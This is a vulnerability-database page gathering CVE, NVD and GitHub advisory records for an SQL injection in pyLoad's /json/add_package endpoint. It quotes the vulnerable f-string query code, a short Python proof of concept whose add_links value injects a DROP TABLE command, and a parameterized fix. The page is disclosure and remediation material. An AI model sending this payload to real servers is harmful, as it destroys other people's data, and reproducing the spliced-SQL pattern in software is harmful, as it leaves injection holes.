CVE-2025-55156 (GCVE-0-2025-55156)
Vulnerability from cvelistv5 – Published: 2025-08-11 22:21 – Updated: 2025-08-12 15:49
VLAI
Title
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter
Summary
pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://github.com/pyload/pyload/security/advisor… | x_refsource_CONFIRM |
| https://github.com/pyload/pyload/commit/134edcdf6… | x_refsource_MISC |
| https://github.com/pyload/pyload/blob/develop/src… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-55156",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-12T15:49:23.306603Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-12T15:49:56.057Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pyload",
"vendor": "pyload",
"versions": [
{
"status": "affected",
"version": "\u003c 0.5.0b3.dev91"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-11T22:21:52.225Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf"
},
{
"name": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f"
},
{
"name": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271"
}
],
"source": {
"advisory": "GHSA-pwh4-6r3m-j2rf",
"discovery": "UNKNOWN"
},
"title": "PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-55156",
"datePublished": "2025-08-11T22:21:52.225Z",
"dateReserved": "2025-08-07T18:27:23.306Z",
"dateUpdated": "2025-08-12T15:49:56.057Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-55156",
"date": "2026-06-02",
"epss": "0.00058",
"percentile": "0.1846"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-55156\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-11T23:15:26.850\",\"lastModified\":\"2025-08-12T14:25:33.177\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91.\"},{\"lang\":\"es\",\"value\":\"pyLoad es un gestor de descargas gratuito y de c\u00f3digo abierto escrito en Python puro. Antes de la versi\u00f3n 0.5.0b3.dev91, el par\u00e1metro add_links en la API /json/add_package era vulnerable a la inyecci\u00f3n de SQL. Los atacantes pueden modificar o eliminar datos de la base de datos, lo que provoca errores o p\u00e9rdida de datos. Este problema se ha corregido en la versi\u00f3n 0.5.0b3.dev91.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"references\":[{\"url\":\"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"cna\": {\"title\": \"PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter\", \"source\": {\"advisory\": \"GHSA-pwh4-6r3m-j2rf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"pyload\", \"product\": \"pyload\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.5.0b3.dev91\"}]}], \"references\": [{\"url\": \"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf\", \"name\": \"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f\", \"name\": \"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271\", \"name\": \"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-11T22:21:52.225Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-55156\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-12T15:49:23.306603Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2025-08-12T15:49:51.562Z\"}}]}",
"cveMetadata": "{\"cveId\": \"CVE-2025-55156\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-11T22:21:52.225Z\", \"dateReserved\": \"2025-08-07T18:27:23.306Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-11T22:21:52.225Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2025-55156
Vulnerability from fkie_nvd - Published: 2025-08-11 23:15 - Updated: 2026-04-15 00:35
Severity
Summary
pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91."
},
{
"lang": "es",
"value": "pyLoad es un gestor de descargas gratuito y de c\u00f3digo abierto escrito en Python puro. Antes de la versi\u00f3n 0.5.0b3.dev91, el par\u00e1metro add_links en la API /json/add_package era vulnerable a la inyecci\u00f3n de SQL. Los atacantes pueden modificar o eliminar datos de la base de datos, lo que provoca errores o p\u00e9rdida de datos. Este problema se ha corregido en la versi\u00f3n 0.5.0b3.dev91."
}
],
"id": "CVE-2025-55156",
"lastModified": "2026-04-15T00:35:42.020",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-08-11T23:15:26.850",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-PWH4-6R3M-J2RF
Vulnerability from github – Published: 2025-08-12 00:13 – Updated: 2025-08-12 13:16
VLAI
Summary
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter
Details
Summary
The parameter add_links in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.
Details
- Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271
- Affected code:
@style.queue
def update_link_info(self, data):
"""
data is list of tuples (name, size, status, url)
"""
self.c.executemany(
"UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)",
data,
)
ids = []
statuses = "','".join(x[3] for x in data)
self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')")
for r in self.c:
ids.append(int(r[0]))
return ids
````
statuses is constructed from data, and data is the value of the add_links parameter entered by the user through /json/add_packge. Because `{statuses}` is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.
- Vulnerability Chain
```xml
josn_blueprint.py#add_package
src/pyload/core/api/__init__.py#add_package
src/pyload/core/managers/file_manager.py#add_links
src/pyload/core/threads/info_thread.py#run
src/pyload/core/threads/info_thread.py#update_info
src/pyload/core/managers/file_manager.py#update_file_info
src/pyload/core/database/file_database.py#update_link_info
PoC
import requests
if __name__ == "__main__":
url = "http://localhost:8000/json/add_package"
data = {
"add_name": "My Downloads1",
"add_dest": "0",
"add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--",
"add_password": "mypassword"
}
response = requests.post(url, cookies=your_cookies, data=data)
print(response.status_code, response.text)
Remediation
```python def update_link_info(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, )
# 提取所有url
urls = [x[3] for x in data]
# 构建参数化查询,避免SQL注入
placeholders = ','.join(['?'] * len(urls))
query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)"
self.c.execute(query, urls)
ids = [int(row[0]) for row in self.c.fetchall()]
return ids
```
Impact
Attackers can modify or delete data in the database, causing data errors or loss.
Severity
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.0b3.dev91"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-55156"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-12T00:13:46Z",
"nvd_published_at": "2025-08-11T23:15:26Z",
"severity": "HIGH"
},
"details": "### Summary\nThe parameter `add_links` in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.\n\n### Details\n- Affected file\uff1ahttps://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271\n- Affected code:\n```python\n@style.queue\n def update_link_info(self, data):\n \"\"\"\n data is list of tuples (name, size, status, url)\n \"\"\"\n self.c.executemany(\n \"UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)\",\n data,\n )\n ids = []\n statuses = \"\u0027,\u0027\".join(x[3] for x in data)\n self.c.execute(f\"SELECT id FROM links WHERE url IN (\u0027{statuses}\u0027)\")\n for r in self.c:\n ids.append(int(r[0]))\n return ids\n````\nstatuses is constructed from data, and data is the value of the add_links parameter entered by the user through /json/add_packge. Because `{statuses}` is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.\n\n- Vulnerability Chain\n```xml\njosn_blueprint.py#add_package\nsrc/pyload/core/api/__init__.py#add_package\nsrc/pyload/core/managers/file_manager.py#add_links\nsrc/pyload/core/threads/info_thread.py#run\nsrc/pyload/core/threads/info_thread.py#update_info\nsrc/pyload/core/managers/file_manager.py#update_file_info\nsrc/pyload/core/database/file_database.py#update_link_info\n```\n\n\n### PoC\n```python\nimport requests\n\n\nif __name__ == \"__main__\":\n url = \"http://localhost:8000/json/add_package\"\n data = {\n \"add_name\": \"My Downloads1\",\n \"add_dest\": \"0\",\n \"add_links\": \"https://www.dailymotion.com/video/x8zzzzz\u0027) or 1; Drop table users;--\",\n \"add_password\": \"mypassword\"\n }\n\n response = requests.post(url, cookies=your_cookies, data=data)\n print(response.status_code, response.text)\n```\n\u003cimg width=\"1599\" height=\"827\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9bdcef37-59b8-4e60-a2b5-beb8a88c3202\" /\u003e\n\n\n\n\n### Remediation\n ```python\ndef update_link_info(self, data):\n \"\"\"\ndata is list of tuples (name, size, status, url)\n\"\"\"\n self.c.executemany(\n \"UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)\",\n data,\n )\n \n # \u63d0\u53d6\u6240\u6709url\n urls = [x[3] for x in data]\n \n # \u6784\u5efa\u53c2\u6570\u5316\u67e5\u8be2\uff0c\u907f\u514dSQL\u6ce8\u5165\n placeholders = \u0027,\u0027.join([\u0027?\u0027] * len(urls))\n query = f\"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)\"\n self.c.execute(query, urls)\n \n ids = [int(row[0]) for row in self.c.fetchall()]\n return ids\n```\n\n\n\n### Impact\nAttackers can modify or delete data in the database, causing data errors or loss.",
"id": "GHSA-pwh4-6r3m-j2rf",
"modified": "2025-08-12T13:16:38Z",
"published": "2025-08-12T00:13:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55156"
},
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
},
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…